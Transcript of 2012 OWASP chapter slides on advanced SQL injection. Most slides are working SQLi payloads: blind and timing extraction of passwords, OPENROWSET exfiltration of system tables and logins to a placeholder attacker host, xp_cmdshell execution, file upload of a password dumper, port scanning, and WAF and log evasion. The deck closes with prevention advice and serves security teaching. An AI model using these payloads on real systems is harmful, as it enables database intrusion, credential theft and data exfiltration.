owasp indy q2 2012 advanced sqli
TRANSCRIPT
![Page 1: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/1.jpg)
Advanced SQLi and Evasion Techniques
![Page 2: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/2.jpg)
About Me
IntroductionDamian Profancik | Technical Lead/Security Services Leader
@ Apparatus, [email protected]
@integrisec
![Page 3: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/3.jpg)
CreditCesar Cerrudo – CTO, IOActive Labs
o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
ModSecurity Team – Trustwave SpiderLabso http://
blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html
Avi Douglen – OWASP Board Member, Israelo http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
![Page 4: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/4.jpg)
SQL Injection Basics• Dynamic construction of SQL queries
“SELECT * FROM table WHERE user = '“ + uname + “' AND pwd = '” + pword + “'”
• Unsanitized user input
uname = ' or 1=1-- => SELECT * FROM table WHERE user = ' ' or 1=1-- ' AND pwd = ' '
• Excessive permissiono Web services running as privileged user with db_owner rightso Connecting to database using sa, dbo, or sysadmin accountso Lax file system permissions
![Page 5: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/5.jpg)
![Page 6: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/6.jpg)
![Page 7: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/7.jpg)
![Page 8: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/8.jpg)
![Page 9: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/9.jpg)
Advance SQLi Techniques• Blind SQL Injection• Data Exfiltration• Privilege Escalation• Command Execution• Uploading Files• Internal DB Server Exploration• Port Scanning• Firewall Evasion• Log Evasion• WAF Evasion
![Page 10: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/10.jpg)
Blind SQL Injection
![Page 11: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/11.jpg)
Blind SQL Injection• Differential Analysis
Example:
http://www.someforum.com/posts.php?id=2
SELECT author, title, body FROM posts WHERE ID = 2
http://www.someforum.com/posts.php?id=2 and 1=2
SELECT author, title, body FROM posts WHERE ID = 2 and 1=2
http://www.someforum.com/posts.php?id=2 and 1=1
SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
![Page 12: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/12.jpg)
Blind SQL Injection (cont.)• Database Management System Fingerprinting
o System Functions• MS SQL Server = getdate()
• MySQL = now()
• Oracle = sysdate()
• Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()
o String Concatenation• MS SQL Server = +
• MySQL = +, CONCAT()
• Oracle = ||, CONCAT()
• Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'
o Query Chaining• MS SQL Server, MySQL = allows chaining with semicolon
• Oracle = does NOT allow chaining with semicolon
• Example: http://www.someforum.com/posts.php?id=2; commit --
![Page 13: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/13.jpg)
Blind SQL Injection (cont.)• Timing Attacks
o Adding delay• SQL Server = WAIT FOR DELAY '0:0:10‘
• MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null)
• PostgreSQL = pg_sleep(10)
• Oracle = Union with query that contains a lot of results
o SELECT IF(condition, true, false)
Example:
…1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
![Page 14: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/14.jpg)
Attacking MS SQL Server
![Page 15: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/15.jpg)
Linked and Remote Servers• OPENROWSET
Example:
SELECT * FROM OPENROWSET( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;'
'SELECT * FROM table' )
• OPENDATASOURCE
Example:
SELECT * FROM OPENDATASOURCE( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' )
.DatabaseName.dbo.TableName
![Page 16: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/16.jpg)
Data Exfiltration• Remote server INSERT
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM table2
![Page 17: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/17.jpg)
Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM master.dbo.sysdatabases
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysobjects ')
SELECT * FROM databasename.dbo.sysobjects
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _syscolumns')
SELECT * FROM databasename.dbo.syscolumns
![Page 18: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/18.jpg)
Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM databasename..table1
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table2')
SELECT * FROM databasename..table2
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
‘SELECT * FROM _sysxlogins')
SELECT * FROM databasename.dbo.sysxlogins
![Page 19: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/19.jpg)
Privilege Escalation• Known vulnerabilities
Example:
SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt
• Often not requiredo Connection strings using SA, dbo, sysadmino Web service context
![Page 20: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/20.jpg)
Command Execution
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC master.dbo.xp_cmdshell 'dir'
![Page 21: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/21.jpg)
Uploading FilesOn attacker’s server…
1. CREATE TABLE AttackerTable (data text)
2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')
On victim’s server…
3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'
4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'
5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
![Page 22: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/22.jpg)
Uploading Files (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC xp_cmdshell '"first script line" >> script.vbs'
…
EXEC xp_cmdshell '"second script line" >> script.vbs'
...
EXEC xp_cmdshell '"last script line" >> script.vbs'
EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary
![Page 23: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/23.jpg)
Internal DB Server Exploration• Linked and Remote Servers
1. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM master.dbo.sysservers
2. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM linkedserver1.master.dbo.sysservers
3. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM linkedserver1.master.dbo.sysdatabases
4. Rinse and repeat…
![Page 24: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/24.jpg)
Port Scanning
Example:
SELECT * FROM OPENROWSET('SQLOLEDB',
'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
'SELECT * FROM table')
![Page 25: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/25.jpg)
Evasion Techniques
![Page 26: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/26.jpg)
Firewall Evasion• Use port 80 for outbound
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
'SELECT * FROM table1')
SELECT * FROM table2
![Page 27: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/27.jpg)
Log Evasion• Inject using POST parameters
• Long HTTP requestso IIS truncates requests longer than 4097 characterso Sun-One Application Server truncates at 4092 characters
Example:
http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--
![Page 28: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/28.jpg)
WAF Evasion• Comments
o # = single line commento -- = single line commento /* */ = inline, multi-line commento /*! */ = MySQL-specific inline, multi-line comment
Example:
http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
• New lineo %0D%0A = URL-encoded newlineo %0B = URL-encoded vertical separator
Example:
http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
![Page 29: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/29.jpg)
WAF Evasion (cont.)• Character Encoding
o Unicode (U+02BC = ʼ)o CHAR()o Hexadecimalo URL-encodingo Double Encoding
Example:
Double Encoding:
URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM…
Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
![Page 30: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/30.jpg)
WAF Evasion (cont.)• Concatenation
o EXEC()o Split/Joino Special Characters (i.e. ‘[‘, ‘+’, ‘%’, etc.)
Example:
Split/Join:
URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
WAF = id=SELECT name
id=password FROM users
ASP/ASP.Net = id=SELECT name,password FROM users
Special Characters:
URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
WAF = id=SEL%ECT name,password FR%OM users
ASP/ASP.Net = id=SELECT name,password FROM users
![Page 31: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/31.jpg)
![Page 32: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/32.jpg)
SQL Injection Prevention
![Page 33: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/33.jpg)
SQLi Prevention• Sanitize User Input
o Normalize Inputo Whitelistso Built-in Functionso Regular Expressionso Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)
• Prepared Statements/Parameterized Queries• Stored Procedures• Accounts with Least Privilege• Enable DisallowAdhocAccess registry setting for MS SQL Server• Perform Self Assessments• Use a Web Application Firewall• Filter Outbound Traffic at Firewall
![Page 34: Owasp Indy Q2 2012 Advanced SQLi](https://reader036.vdocuments.site/reader036/viewer/2022062303/5562a47cd8b42a7c4a8b4b5c/html5/thumbnails/34.jpg)
Q & A